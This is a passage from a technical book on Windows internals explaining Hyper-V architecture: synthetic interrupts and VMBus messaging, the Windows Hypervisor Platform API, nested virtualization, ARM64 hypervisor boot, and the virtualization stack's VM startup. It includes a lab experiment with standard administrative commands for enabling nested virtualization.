hypervisor checks whether one (or more) synthetic interrupt needs to be
delivered. As discussed previously, synthetic interrupts aren’t generated by
any hardware; they’re usually generated from the hypervisor itself (under
certain conditions), and they are still managed by the SynIC, which is able to
inject the virtual interrupt to the correct VP. Even though they’re extensively
used by the NT kernel (the enlightened clock timer is a good example),
synthetic interrupts are fundamental for the Virtual Secure Mode (VSM). We
discuss them in in the section “The Secure Kernel” later in this chapter.
The root partition can send a customized virtual interrupt to a child by
using the HvAssertVirtualInterrupt hypercall (documented in the TLFS).
Inter-partition communication
The synthetic interrupt controller also has the important role of providing
inter-partition communication facilities to the virtual machines. The
hypervisor provides two principal mechanisms for one partition to
communicate with another: messages and events. In both cases, the
notifications are sent to the target VP using synthetic interrupts. Messages
and events are sent from a source partition to a target partition through a
preallocated connection, which is associated with a destination port.
One of the most important components that uses the inter-partition
communication services provided by the SynIC is VMBus. (VMBus
architecture is discussed in the “Virtualization stack” section later in this
chapter.) The VMBus root driver (Vmbusr.sys) in the root allocates a port ID
(ports are identified by a 32-bit ID) and creates a port in the child partition by
emitting the HvCreatePort hypercall through the services provided by the
WinHv driver.
A port is allocated in the hypervisor from the receiver’s memory pool.
When a port is created, the hypervisor allocates sixteen message buffers from
the port memory. The message buffers are maintained in a queue associated
with a SINT (synthetic interrupt source) in the virtual processor’s SynIC. The
hypervisor exposes sixteen interrupt sources, which can allow the VMBus
root driver to manage a maximum of 16 message queues. A synthetic
message has the fixed size of 256 bytes and can transfer only 240 bytes (16
bytes are used as header). The caller of the HvCreatePort hypercall specifies
which virtual processor and SINT to target.
To correctly receive messages, the WinHv driver allocates a synthetic
interrupt message page (SIMP), which is then shared with the hypervisor.
When a message is enqueued for a target partition, the hypervisor copies the
message from its internal queue to the SIMP slot corresponding to the correct
SINT. The VMBus root driver then creates a connection, which associates
the port opened in the child VM to the parent, through the HvConnectPort
hypercall. After the child has enabled the reception of synthetic interrupts in
the correct SINT slot, the communication can start; the sender can post a
message to the client by specifying a target Port ID and emitting the
HvPostMessage hypercall. The hypervisor injects a synthetic interrupt to the
target VP, which can read from the message page (SIMP) the content of the
message.
The hypervisor supports ports and connections of three types:
■ Message ports Transmit 240-byte messages from and to a partition.
A message port is associated with a single SINT in the parent and
child partition. Messages will be delivered in order through a single
port message queue. This characteristic makes messages ideal for
VMBus channel setup and teardown (further details are provided in
the “Virtualization stack” section later in this chapter).
■ Event ports Receive simple interrupts associated with a set of flags,
set by the hypervisor when the opposite endpoint makes a
HvSignalEvent hypercall. This kind of port is normally used as a
synchronization mechanism. VMBus, for example, uses an event port
to notify that a message has been posted on the ring buffer described
by a particular channel. When the event interrupt is delivered to the
target partition, the receiver knows exactly to which channel the
interrupt is targeted thanks to the flag associated with the event.
■ Monitor ports An optimization to the Event port. Causing a
VMEXIT and a VM context switch for every single HvSignalEvent
hypercall is an expensive operation. Monitor ports are set up by
allocating a shared page (between the hypervisor and the partition)
that contains a data structure indicating which event port is associated
with a particular monitored notification flag (a bit in the page). In that
way, when the source partition wants to send a synchronization
interrupt, it can just set the corresponding flag in the shared page.
Sooner or later the hypervisor will notice the bit set in the shared page
and will trigger an interrupt to the event port.
The Windows hypervisor platform API and EXO
partitions
Windows increasingly uses Hyper-V’s hypervisor for providing functionality
not only related to running traditional VMs. In particular, as we will discuss
discuss in the second part of this chapter, VSM, an important security
component of modern Windows versions, leverages the hypervisor to enforce
a higher level of isolation for features that provide critical system services or
handle secrets such as passwords. Enabling these features requires that the
hypervisor is running by default on a machine.
External virtualization products, like VMware, Qemu, VirtualBox,
Android Emulator, and many others use the virtualization extensions
provided by the hardware to build their own hypervisors, which is needed for
allowing them to correctly run. This is clearly not compatible with Hyper-V,
which launches its hypervisor before the Windows kernel starts up in the root
partition (the Windows hypervisor is a native, or bare-metal hypervisor).
As for Hyper-V, external virtualization solutions are also composed of a
hypervisor, which provides generic low-level abstractions for the processor’s
execution and memory management of the VM, and a virtualization stack,
which refers to the components of the virtualization solution that provide the
emulated environment for the VM (like its motherboard, firmware, storage
controllers, devices, and so on).
The Windows Hypervisor Platform API, which is documented at
https://docs.microsoft.com/en-us/virtualization/api/, has the main goal to
enable running third-party virtualization solutions on the Windows
hypervisor. Specifically, a third-party virtualization product should be able to
create, delete, start, and stop VMs with characteristics (firmware, emulated
devices, storage controllers) defined by its own virtualization stack. The
third-party virtualization stack, with its management interfaces, continues to
run on Windows in the root partition, which allows for an unchanged use of
its VMs by their client.
As shown in Figure 9-19, all the Windows hypervisor platform’s APIs run
in user mode and are implemented on the top of the VID and WinHvr driver
in two libraries: WinHvPlatform.dll and WinHvEmulation.dll (the latter
implements the instruction emulator for MMIO).
Figure 9-19 The Windows hypervisor platform API architecture.
A user mode application that wants to create a VM and its relative virtual
processors usually should do the following:
1.
Create the partition in the VID library (Vid.dll) with the
WHvCreatePartition API.
2.
Configure various internal partition’s properties—like its virtual
processor count, the APIC emulation mode, the kind of requested
VMEXITs, and so on—using the WHvSetPartitionProperty API.
3.
Create the partition in the VID driver and the hypervisor using the
WHvSetupPartition API. (This kind of partition in the hypervisor is
called an EXO partition, as described shortly.) The API also creates
the partition’s virtual processors, which are created in a suspended
state.
4.
Create the corresponding virtual processor(s) in the VID library
through the WHvCreateVirtual-Processor API. This step is important
because the API sets up and maps a message buffer into the user
mode application, which is used for asynchronous communication
with the hypervisor and the thread running the virtual CPUs.
5.
Allocate the address space of the partition by reserving a big range of
virtual memory with the classic VirtualAlloc function (read more
details in Chapter 5 of Part 1) and map it in the hypervisor through the
WHvMapGpaRange API. A fine-grained protection of the guest
physical memory can be specified when allocating guest physical
memory in the guest virtual address space by committing different
ranges of the reserved virtual memory.
6.
Create the page-tables and copy the initial firmware code in the
committed memory.
7.
Set the initial VP’s registers content using the
WHvSetVirtualProcessorRegisters API.
8.
Run the virtual processor by calling the WHvRunVirtualProcessor
blocking API. The function returns only when the guest code executes
an operation that requires handling in the virtualization stack (a
VMEXIT in the hypervisor has been explicitly required to be
managed by the third-party virtualization stack) or because of an
external request (like the destroying of the virtual processor, for
example).
The Windows hypervisor platform APIs are usually able to call services in
the hypervisor by sending different IOCTLs to the \Device\VidExo device
object, which is created by the VID driver at initialization time, only if the
HKLM\System\CurrentControlSet\Services\Vid\Parameters\ExoDeviceEnabl
ed registry value is set to 1. Otherwise, the system does not enable any
support for the hypervisor APIs.
Some performance-sensitive hypervisor platform APIs (a good example is
provided by WHvRunVirtualProcessor) can instead call directly into the
hypervisor from user mode thanks to the Doorbell page, which is a special
invalid guest physical page, that, when accessed, always causes a VMEXIT.
The Windows hypervisor platform API obtains the address of the doorbell
page from the VID driver. It writes to the doorbell page every time it emits a
hypercall from user mode. The fault is identified and treated differently by
the hypervisor thanks to the doorbell page’s physical address, which is
marked as “special” in the SLAT page table. The hypervisor reads the
hypercall’s code and parameters from the VP’s registers as per normal
hypercalls, and ultimately transfers the execution to the hypercall’s handler
routine. When the latter finishes its execution, the hypervisor finally
performs a VMENTRY, landing on the instruction following the faulty one.
This saves a lot of clock cycles to the thread backing the guest VP, which no
longer has a need to enter the kernel for emitting a hypercall. Furthermore,
the VMCALL and similar opcodes always require kernel privileges to be
executed.
The virtual processors of the new third-party VM are dispatched using the
root scheduler. In case the root scheduler is disabled, any function of the
hypervisor platform API can’t run. The created partition in the hypervisor is
an EXO partition. EXO partitions are minimal partitions that don’t include
any synthetic functionality and have certain characteristics ideal for creating
third-party VMs:
■ They are always VA-backed types. (More details about VA-backed or
micro VMs are provided later in the “Virtualization stack” section.)
The partition’s memory-hosting process is the user mode application,
which created the VM, and not a new instance of the VMMEM
process.
■ They do not have any partition’s privilege or support any VTL
(virtual trust level) other than 0. All of a classical partition’s
privileges refer to synthetic functionality, which is usually exposed by
the hypervisor to the Hyper-V virtualization stack. EXO partitions are
used for third-party virtualization stacks. They do not need the
functionality brought by any of the classical partition’s privilege.
■ They manually manage timing. The hypervisor does not provide any
virtual clock interrupt source for EXO partition. The third-party
virtualization stack must take over the responsibility of providing this.
This means that every attempt to read the virtual processor’s time-
stamp counter will cause a VMEXIT in the hypervisor, which will
route the intercept to the user mode thread that runs the VP.
Note
EXO partitions include other minor differences compared to classical
hypervisor partitions. For the sake of the discussion, however, those
minor differences are irrelevant, so they are not mentioned in this book.
Nested virtualization
Large servers and cloud providers sometimes need to be able to run
containers or additional virtual machines inside a guest partition. Figure 9-20
describes this scenario: The hypervisor that runs on the top of the bare-metal
hardware, identified as the L0 hypervisor (L0 stands for Level 0), uses the
virtualization extensions provided by the hardware to create a guest VM.
Furthermore, the L0 hypervisor emulates the processor’s virtualization
extensions and exposes them to the guest VM (the ability to expose
virtualization extensions is called nested virtualization). The guest VM can
decide to run another instance of the hypervisor (which, in this case, is
identified as L1 hypervisor, where L1 stands for Level 1), by using the
emulated virtualization extensions exposed by the L0 hypervisor. The L1
hypervisor creates the nested root partition and starts the L2 root operating
system in it. In the same way, the L2 root can orchestrate with the L1
hypervisor to launch a nested guest VM. The final guest VM in this
configuration takes the name of L2 guest.
Figure 9-20 Nested virtualization scheme.
Nested virtualization is a software construction: the hypervisor must be
able to emulate and manage virtualization extensions. Each virtualization
instruction, while executed by the L1 guest VM, causes a VMEXIT to the L0
hypervisor, which, through its emulator, can reconstruct the instruction and
perform the needed work to emulate it. At the time of this writing, only Intel
and AMD hardware is supported. The nested virtualization capability should
be explicitly enabled for the L1 virtual machine; otherwise, the L0 hypervisor
injects a general protection exception in the VM in case a virtualization
instruction is executed by the guest operating system.
On Intel hardware, Hyper-V allows nested virtualization to work thanks to
two main concepts:
■ Emulation of the VT-x virtualization extensions
■ Nested address translation
As discussed previously in this section, for Intel hardware, the basic data
structure that describes a virtual machine is the virtual machine control
structure (VMCS). Other than the standard physical VMCS representing the
L1 VM, when the L0 hypervisor creates a VP belonging to a partition that
supports nested virtualization, it allocates some nested VMCS data structures
(not to be confused with a virtual VMCS, which is a different concept). The
nested VMCS is a software descriptor that contains all the information
needed by the L0 hypervisor to start and run a nested VP for a L2 partition.
As briefly introduced in the “Hypervisor startup” section, when the L1
hypervisor boots, it detects whether it’s running in a virtualized environment
and, if so, enables various nested enlightenments, like the enlightened VMCS
or the direct virtual flush (discussed later in this section).
As shown in Figure 9-21, for each nested VMCS, the L0 hypervisor also
allocates a Virtual VMCS and a hardware physical VMCS, two similar data
structures representing a VP running the L2 virtual machine. The virtual
VMCS is important because it has the key role in maintaining the nested
virtualized data. The physical VMCS instead is loaded by the L0 hypervisor
when the L2 virtual machine is started; this happens when the L0 hypervisor
intercepts a VMLAUNCH instruction executed by the L1 hypervisor.
Figure 9-21 A L0 hypervisor running a L2 VM by virtual processor 2.
In the sample picture, the L0 hypervisor has scheduled the VP 2 for
running a L2 VM managed by the L1 hypervisor (through the nested virtual
processor 1). The L1 hypervisor can operate only on virtualization data
replicated in the virtual VMCS.
Emulation of the VT-x virtualization extensions
On Intel hardware, the L0 hypervisor supports both enlightened and
nonenlightened L1 hypervisors. The only official supported configuration is
Hyper-V running on the top of Hyper-V, though.
In a nonenlightened hypervisor, all the VT-x instructions executed in the
L1 guest causes a VMEXIT. After the L1 hypervisor has allocated the guest
physical VMCS for describing the new L2 VM, it usually marks it as active
(through the VMPTRLD instruction on Intel hardware). The L0 hypervisor
intercepts the operation and associates an allocated nested VMCS with the
guest physical VMCS specified by the L1 hypervisor. Furthermore, it fills the
initial values for the virtual VMCS and sets the nested VMCS as active for
the current VP. (It does not switch the physical VMCS though; the execution
context should remain the L1 hypervisor.) Each subsequent read or write to
the physical VMCS performed by the L1 hypervisor is always intercepted by
the L0 hypervisor and redirected to the virtual VMCS (refer to Figure 9-21).
When the L1 hypervisor launches the VM (performing an operation called
VMENTRY), it executes a specific hardware instruction (VMLAUNCH on
Intel hardware), which is intercepted by the L0 hypervisor. For
nonenlightened scenarios, the L0 hypervisor copies all the guest fields of the
virtual VMCS to another physical VMCS representing the L2 VM, writes the
host fields by pointing them to L0 hypervisor’s entry points, and sets it as
active (by using the hardware VMPTRLD instruction on Intel platforms). In
case the L1 hypervisor uses the second level address translation (EPT for
Intel hardware), the L0 hypervisor then shadows the currently active L1
extended page tables (see the following section for more details). Finally, it
performs the actual VMENTRY by executing the specific hardware
instruction. As a result, the hardware executes the L2 VM’s code.
While executing the L2 VM, each operation that causes a VMEXIT
switches the execution context back to the L0 hypervisor (instead of the L1).
As a response, the L0 hypervisor performs another VMENTRY on the
original physical VMCS representing the L1 hypervisor context, injecting a
synthetic VMEXIT event. The L1 hypervisor restarts the execution and
handles the intercepted event as for regular non-nested VMEXITs. When the
L1 completes the internal handling of the synthetic VMEXIT event, it
executes a VMRESUME operation, which will be intercepted again by the
L0 hypervisor and managed in a similar way of the initial VMENTRY
operation described earlier.
Producing a VMEXIT each time the L1 hypervisor executes a
virtualization instruction is an expensive operation, which could definitively
contribute in the general slowdown of the L2 VM. For overcoming this
problem, the Hyper-V hypervisor supports the enlightened VMCS, an
optimization that, when enabled, allows the L1 hypervisor to load, read, and
write virtualization data from a memory page shared between the L1 and L0
hypervisor (instead of a physical VMCS). The shared page is called
enlightened VMCS. When the L1 hypervisor manipulates the virtualization
data belonging to a L2 VM, instead of using hardware instructions, which
cause a VMEXIT into the L0 hypervisor, it directly reads and writes from the
enlightened VMCS. This significantly improves the performance of the L2
VM.
In enlightened scenarios, the L0 hypervisor intercepts only VMENTRY
and VMEXIT operations (and some others that are not relevant for this
discussion). The L0 hypervisor manages VMENTRY in a similar way to the
nonenlightened scenario, but, before doing anything described previously, it
copies the virtualization data located in the shared enlightened VMCS
memory page to the virtual VMCS representing the L2 VM.
Note
It is worth mentioning that for nonenlightened scenarios, the L0
hypervisor supports another technique for preventing VMEXITs while
managing nested virtualization data, called shadow VMCS. Shadow
VMCS is a hardware optimization very similar to the enlightened VMCS.
Nested address translation
As previously discussed in the “Partitions’ physical address space” section,
the hypervisor uses the SLAT for providing an isolated guest physical
address space to a VM and to translate GPAs to real SPAs. Nested virtual
machines would require another hardware layer of translation on top of the
two already existing. For supporting nested virtualization, the new layer
should have been able to translate L2 GPAs to L1 GPAs. Due to the
increased complexity in the electronics needed to build a processor’s MMU
that manages three layers of translations, the Hyper-V hypervisor adopted
another strategy for providing the additional layer of address translation,
called shadow nested page tables. Shadow nested page tables use a technique
similar to the shadow paging (see the previous section) for directly translating
L2 GPAs to SPAs.
When a partition that supports nested virtualization is created, the L0
hypervisor allocates and initializes a nested page table shadowing domain.
The data structure is used for storing a list of shadow nested page tables
associated with the different L2 VMs created in the partition. Furthermore, it
stores the partition’s active domain generation number (discussed later in this
section) and nested memory statistics.
When the L0 hypervisor performs the initial VMENTRY for starting a L2
VM, it allocates the shadow nested page table associated with the VM and
initializes it with empty values (the resulting physical address space is
empty). When the L2 VM begins code execution, it immediately produces a
VMEXIT to the L0 hypervisor due to a nested page fault (EPT violation in
Intel hardware). The L0 hypervisor, instead of injecting the fault in the L1,
walks the guest’s nested page tables built by the L1 hypervisor. If it finds a
valid entry for the specified L2 GPA, it reads the corresponding L1 GPA,
translates it to an SPA, and creates the needed shadow nested page table
hierarchy to map it in the L2 VM. It then fills the leaf table entry with the
valid SPA (the hypervisor uses large pages for mapping shadow nested
pages) and resumes the execution directly to the L2 VM by setting the nested
VMCS that describes it as active.
For the nested address translation to work correctly, the L0 hypervisor
should be aware of any modifications that happen to the L1 nested page
tables; otherwise, the L2 VM could run with stale entries. This
implementation is platform specific; usually hypervisors protect the L2
nested page table for read-only access. In that way they can be informed
when the L1 hypervisor modifies it. The Hyper-V hypervisor adopts another
smart strategy, though. It guarantees that the shadow nested page table
describing the L2 VM is always updated because of the following two
premises:
■ When the L1 hypervisor adds new entries in the L2 nested page table,
it does not perform any other action for the nested VM (no intercepts
are generated in the L0 hypervisor). An entry in the shadow nested
page table is added only when a nested page fault causes a VMEXIT
in the L0 hypervisor (the scenario described previously).
■ As for non-nested VM, when an entry in the nested page table is
modified or deleted, the hypervisor should always emit a TLB flush
for correctly invalidating the hardware TLB. In case of nested
virtualization, when the L1 hypervisor emits a TLB flush, the L0
intercepts the request and completely invalidates the shadow nested
page table. The L0 hypervisor maintains a virtual TLB concept thanks
to the generation IDs stored in both the shadow VMCS and the nested
page table shadowing domain. (Describing the virtual TLB
architecture is outside the scope of the book.)
Completely invalidating the shadow nested page table for a single address
changed seems to be redundant, but it’s dictated by the hardware support.
(The INVEPT instruction on Intel hardware does not allow specifying which
single GPA to remove from the TLB.) In classical VMs, this is not a problem
because modifications on the physical address space don’t happen very often.
When a classical VM is started, all its memory is already allocated. (The
“Virtualization stack” section will provide more details.) This is not true for
VA-backed VMs and VSM, though.
For improving performance in nonclassical nested VMs and VSM
scenarios (see the next section for details), the hypervisor supports the “direct
virtual flush” enlightenment, which provides to the L1 hypervisor two
hypercalls to directly invalidate the TLB. In particular, the
HvFlushGuestPhysicalAddress List hypercall (documented in the TLFS)
allows the L1 hypervisor to invalidate a single entry in the shadow nested
page table, removing the performance penalties associated with the flushing
of the entire shadow nested page table and the multiple VMEXIT needed to
reconstruct it.
EXPERIMENT: Enabling nested virtualization on
Hyper-V
As explained in this section, for running a virtual machine into a L1
Hyper-V VM, you should first enable the nested virtualization
feature in the host system. For this experiment, you need a
workstation with an Intel or AMD CPU and Windows 10 or
Windows Server 2019 installed (Anniversary Update RS1
minimum version). You should create a Type-2 VM using the
Hyper-V Manager or Windows PowerShell with at least 4 GB of
memory. In the experiment, you’re creating a nested L2 VM into
the created VM, so enough memory needs to be assigned.
After the first startup of the VM and the initial configuration,
you should shut down the VM and open an administrative
PowerShell window (type Windows PowerShell in the Cortana
search box. Then right-click the PowerShell icon and select Run
As Administrator). You should then type the following command,
where the term “<VmName>” must be replaced by your virtual
machine name:
Click here to view code image
Set-VMProcessor -VMName "<VmName>" -
ExposeVirtualizationExtension $true
To properly verify that the nested virtualization feature is
correctly enabled, the command
Click here to view code image
$(Get-VMProcessor -VMName "
<VmName>").ExposeVirtualizationExtensions
should return True.
After the nested virtualization feature has been enabled, you can
restart your VM. Before being able to run the L1 hypervisor in the
virtual machine, you should add the necessary component through
the Control panel. In the VM, search Control Panel in the Cortana
box, open it, click Programs, and the select Turn Windows
Features On Or Off. You should check the entire Hyper-V tree, as
shown in the next figure.
Click OK. After the procedure finishes, click Restart to reboot
the virtual machine (this step is needed). After the VM restarts, you
can verify the presence of the L1 hypervisor through the System
Information application (type msinfo32 in the Cortana search box.
Refer to the “Detecting VBS and its provided services” experiment
later in this chapter for further details). If the hypervisor has not
been started for some reason, you can force it to start by opening an
administrative command prompt in the VM (type cmd in the
Cortana search box and select Run As Administrator) and insert
the following command:
Click here to view code image
bcdedit /set {current} hypervisorlaunchtype Auto
At this stage, you can use the Hyper-V Manager or Windows
PowerShell to create a L2 guest VM directly in your virtual
machine. The result can be something similar to the following
figure.
From the L2 root partition, you can also enable the L1
hypervisor debugger, in a similar way as explained in the
“Connecting the hypervisor debugger” experiment previously in
this chapter. The only limitation at the time of this writing is that
you can’t use the network debugging in nested configurations; the
only supported configuration for debugging the L1 hypervisor is
through serial port. This means that in the host system, you should
enable two virtual serial ports in the L1 VM (one for the hypervisor
and the other one for the L2 root partition) and attach them to
named pipes. For type-2 virtual machines, you should use the
following PowerShell commands to set the two serial ports in the
L1 VM (as with the previous commands, you should replace the
term “<VMName>” with the name of your virtual machine):
Click here to view code image
Set-VMComPort -VMName "<VMName>" -Number 1 -Path
\\.\pipe\HV_dbg
Set-VMComPort -VMName "<VMName>" -Number 2 -Path
\\.\pipe\NT_dbg
After that, you should configure the hypervisor debugger to be
attached to the COM1 serial port, while the NT kernel debugger
should be attached to the COM2 (see the previous experiment for
more details).
The Windows hypervisor on ARM64
Unlike the x86 and AMD64 architectures, where the hardware virtualization
support was added long after their original design, the ARM64 architecture
has been designed with hardware virtualization support. In particular, as
shown in Figure 9-22, the ARM64 execution environment has been split in
three different security domains (called Exception Levels). The EL
determines the level of privilege; the higher the EL, the more privilege the
executing code has. Although all the user mode applications run in EL0, the
NT kernel (and kernel mode drivers) usually runs in EL1. In general, a piece
of software runs only in a single exception level. EL2 is the privilege level
designed for running the hypervisor (which, in ARM64 is also called “Virtual
machine manager”) and is an exception to this rule. The hypervisor provides
virtualization services and can run in Nonsecure World both in EL2 and EL1.
(EL2 does not exist in the Secure World. ARM TrustZone will be discussed
later in this section.)
Figure 9-22 The ARM64 execution environment.
Unlike from the AMD64 architecture, where the CPU enters the root mode
(the execution domain in which the hypervisor runs) only from the kernel
context and under certain assumptions, when a standard ARM64 device
boots, the UEFI firmware and the boot manager begin their execution in EL2.
On those devices, the hypervisor loader (or Secure Launcher, depending on
the boot flow) is able to start the hypervisor directly and, at later time, drop
the exception level to EL1 (by emitting an exception return instruction, also
known as ERET).
On the top of the exception levels, TrustZone technology enables the
system to be partitioned between two execution security states: secure and
non-secure. Secure software can generally access both secure and non-secure
memory and resources, whereas normal software can only access non-secure
memory and resources. The non-secure state is also referred to as the Normal
World. This enables an OS to run in parallel with a trusted OS on the same
hardware and provides protection against certain software attacks and
hardware attacks. The secure state, also referred as Secure World, usually
runs secure devices (their firmware and IOMMU ranges) and, in general,
everything that requires the processor to be in the secure state.
To correctly communicate with the Secure World, the non-secure OS
emits secure method calls (SMC), which provide a mechanism similar to
standard OS syscalls. SMC are managed by the TrustZone. TrustZone
usually provides separation between the Normal and the Secure Worlds
through a thin memory protection layer, which is provided by well-defined
hardware memory protection units (Qualcomm calls these XPUs). The XPUs
are configured by the firmware to allow only specific execution
environments to access specific memory locations. (Secure World memory
can’t be accessed by Normal World software.)
In ARM64 server machines, Windows is able to directly start the
hypervisor. Client machines often do not have XPUs, even though TrustZone
is enabled. (The majority of the ARM64 client devices in which Windows
can run are provided by Qualcomm.) In those client devices, the separation
between the Secure and Normal Worlds is provided by a proprietary
hypervisor, named QHEE, which provides memory isolation using stage-2
memory translation (this layer is the same as the SLAT layer used by the
Windows hypervisor). QHEE intercepts each SMC emitted by the running
OS: it can forward the SMC directly to TrustZone (after having verified the
necessary access rights) or do some work on its behalf. In these devices,
TrustZone also has the important responsibility to load and verify the
authenticity of the machine firmware and coordinates with QHEE for
correctly executing the Secure Launch boot method.
Although in Windows the Secure World is generally not used (a
distinction between Secure/Non secure world is already provided by the
hypervisor through VTL levels), the Hyper-V hypervisor still runs in EL2.
This is not compatible with the QHEE hypervisor, which runs in EL2, too.
To solve the problem correctly, Windows adopts a particular boot strategy;
the Secure launch process is orchestrated with the aid of QHEE. When the
Secure Launch terminates, the QHEE hypervisor unloads and gives up
execution to the Windows hypervisor, which has been loaded as part of the
Secure Launch. In later boot stages, after the Secure Kernel has been
launched and the SMSS is creating the first user mode session, a new special
trustlet is created (Qualcomm named it as “QcExt”). The trustlet acts as the
original ARM64 hypervisor; it intercepts all the SMC requests, verifies the
integrity of them, provides the needed memory isolations (through the
services exposed by the Secure Kernel) and is able to send and receive
commands from the Secure Monitor in EL3.
The SMC interception architecture is implemented in both the NT kernel
and the ARM64 trustlet and is outside the scope of this book. The
introduction of the new trustlet has allowed the majority of the client ARM64
machines to boot with Secure Launch and Virtual Secure Mode enabled by
default. (VSM is discussed later in this chapter.)
The virtualization stack
Although the hypervisor provides isolation and the low-level services that
manage the virtualization hardware, all the high-level implementation of
virtual machines is provided by the virtualization stack. The virtualization
stack manages the states of the VMs, provides memory to them, and
virtualizes the hardware by providing a virtual motherboard, the system
firmware, and multiple kind of virtual devices (emulated, synthetic, and
direct access). The virtualization stack also includes VMBus, an important
component that provides a high-speed communication channel between a
guest VM and the root partition and can be accessed through the kernel mode
client library (KMCL) abstraction layer.
In this section, we discuss some important services provided by the
virtualization stack and analyze its components. Figure 9-23 shows the main
components of the virtualization stack.
Figure 9-23 Components of the virtualization stack.
Virtual machine manager service and worker
processes
The virtual machine manager service (Vmms.exe) is responsible for
providing the Windows Management Instrumentation (WMI) interface to the
root partition, which allows managing the child partitions through a
Microsoft Management Console (MMC) plug-in or through PowerShell. The
VMMS service manages the requests received through the WMI interface on
behalf of a VM (identified internally through a GUID), like start, power off,
shutdown, pause, resume, reboot, and so on. It controls settings such as which
devices are visible to child partitions and how the memory and processor
allocation for each partition is defined. The VMMS manages the addition and
removal of devices. When a virtual machine is started, the VMM Service also
has the crucial role of creating a corresponding Virtual Machine Worker
Process (VMWP.exe). The VMMS manages the VM snapshots by redirecting
the snapshot requests to the VMWP process in case the VM is running or by
taking the snapshot itself in the opposite case.
The VMWP performs various virtualization work that a typical monolithic
hypervisor would perform (similar to the work of a software-based
virtualization solution). This means managing the state machine for a given
child partition (to allow support for features such as snapshots and state
transitions), responding to various notifications coming in from the
hypervisor, performing the emulation of certain devices exposed to child
partitions (called emulated devices), and collaborating with the VM service
and configuration component. The Worker process has the important role to
start the virtual motherboard and to maintain the state of each virtual device
that belongs to the VM. It also includes components responsible for remote
management of the virtualization stack, as well as an RDP component that
allows using the remote desktop client to connect to any child partition and
remotely view its user interface and interact with it. The VM Worker process
exposes the COM objects that provide the interface used by the Vmms (and
the VmCompute service) to communicate with the VMWP instance that
represents a particular virtual machine.
The VM host compute service (implemented in the Vmcompute.exe and
Vmcompute.dll binaries) is another important component that hosts most of
the computation-intensive operations that are not implemented in the VM
Manager Service. Operation like the analysis of a VM’s memory report (for
dynamic memory), management of VHD and VHDX files, and creation of
the base layers for containers are implemented in the VM host compute
service. The Worker Process and Vmms can communicate with the host
compute service thanks the COM objects that it exposes.
The Virtual Machine Manager Service, the Worker Process, and the VM
compute service are able to open and parse multiple configuration files that
expose a list of all the virtual machines created in the system, and the
configuration of each of them. In particular:
■ The configuration repository stores the list of virtual machines
installed in the system, their names, configuration file and GUID in
the data.vmcx file located in C:\ProgramData\Microsoft\Windows
Hyper-V.
■ The VM Data Store repository (part of the VM host compute service)
is able to open, read, and write the configuration file (usually with
“.vmcx” extension) of a VM, which contains the list of virtual devices
and the virtual hardware’s configuration.
The VM data store repository is also used to read and write the VM Save
State file. The VM State file is generated while pausing a VM and contains
the save state of the running VM that can be restored at a later time (state of
the partition, content of the VM’s memory, state of each virtual device). The
configuration files are formatted using an XML representation of key/value
pairs. The plain XML data is stored compressed using a proprietary binary
format, which adds a write-journal logic to make it resilient against power
failures. Documenting the binary format is outside the scope of this book.
The VID driver and the virtualization stack
memory manager
The Virtual Infrastructure Driver (VID.sys) is probably one of the most
important components of the virtualization stack. It provides partition,
memory, and processor management services for the virtual machines
running in the child partition, exposing them to the VM Worker process,
which lives in the root. The VM Worker process and the VMMS services use
the VID driver to communicate with the hypervisor, thanks to the interfaces
implemented in the Windows hypervisor interface driver (WinHv.sys and
WinHvr.sys), which the VID driver imports. These interfaces include all the
code to support the hypervisor’s hypercall management and allow the
operating system (or generic kernel mode drivers) to access the hypervisor
using standard Windows API calls instead of hypercalls.
The VID driver also includes the virtualization stack memory manager. In
the previous section, we described the hypervisor memory manager, which
manages the physical and virtual memory of the hypervisor itself. The guest
physical memory of a VM is allocated and managed by the virtualization
stack’s memory manager. When a VM is started, the spawned VM Worker
process (VMWP.exe) invokes the services of the memory manager (defined
in the IMemoryManager COM interface) for constructing the guest VM’s
RAM. Allocating memory for a VM is a two-step process:
1.
The VM Worker process obtains a report of the global system’s
memory state (by using services from the Memory Balancer in the
VMMS process), and, based on the available system memory,
determines the size of the physical memory blocks to request to the
VID driver (through the VID_RESERVE IOCTL. Sizes of the block
vary from 64 MB up to 4 GB). The blocks are allocated by the VID
driver using MDL management functions
(MmAllocatePartitionNodePagesForMdlEx in particular). For
performance reasons, and to avoid memory fragmentation, the VID
driver implements a best-effort algorithm to allocate huge and large
physical pages (1 GB and 2 MB) before relying on standard small
pages. After the memory blocks are allocated, their pages are
deposited to an internal “reserve” bucket maintained by the VID
driver. The bucket contains page lists ordered in an array based on
their quality of service (QOS). The QOS is determined based on the
page type (huge, large, and small) and the NUMA node they belong
to. This process in the VID nomenclature is called “reserving physical
memory” (not to be confused with the term “reserving virtual
memory,” a concept of the NT memory manager).
2.
From the virtualization stack perspective, physical memory
commitment is the process of emptying the reserved pages in the
bucket and moving them in a VID memory block
(VSMM_MEMORY_BLOCK data structure), which is created and
owned by the VM Worker process using the VID driver’s services. In
the process of creating a memory block, the VID driver first deposits
additional physical pages in the hypervisor (through the Winhvr
driver and the HvDepositMemory hypercall). The additional pages are
needed for creating the SLAT table page hierarchy of the VM. The
VID driver then requests to the hypervisor to map the physical pages
describing the entire guest partition’s RAM. The hypervisor inserts
valid entries in the SLAT table and sets their proper permissions. The
guest physical address space of the partition is created. The GPA
range is inserted in a list belonging to the VID partition. The VID
memory block is owned by the VM Worker process. It’s also used for
tracking guest memory and in DAX file-backed memory blocks. (See
Chapter 11, “Caching and file system support,” for more details about
DAX volumes and PMEM.) The VM Worker process can later use
the memory block for multiple purposes—for example, to access
some pages while managing emulated devices.
The birth of a Virtual Machine (VM)
The process of starting up a virtual machine is managed primarily by the
VMMS and VMWP process. When a request to start a VM (internally
identified by a GUID) is delivered to the VMMS service (through PowerShell
or the Hyper-V Manager GUI application), the VMMS service begins the
starting process by reading the VM’s configuration from the data store
repository, which includes the VM’s GUID and the list of all the virtual
devices (VDEVs) comprising its virtual hardware. It then verifies that the
path containing the VHD (or VHDX) representing the VM’s virtual hard disk
has the correct access control list (ACL, more details provided later). In case
the ACL is not correct, if specified by the VM configuration, the VMMS
service (which runs under a SYSTEM account) rewrites a new one, which is
compatible with the new VMWP process instance. The VMMS uses COM
services to communicate with the Host Compute Service to spawn a new
VMWP process instance.
The Host Compute Service gets the path of the VM Worker process by
querying its COM registration data located in the Windows registry
(HKCU\CLSID\{f33463e0-7d59-11d9-9916-0008744f51f3} key). It then
creates the new process using a well-defined access token, which is built
using the virtual machine SID as the owner. Indeed, the NT Authority of the
Windows Security model defines a well-known subauthority value (83) to
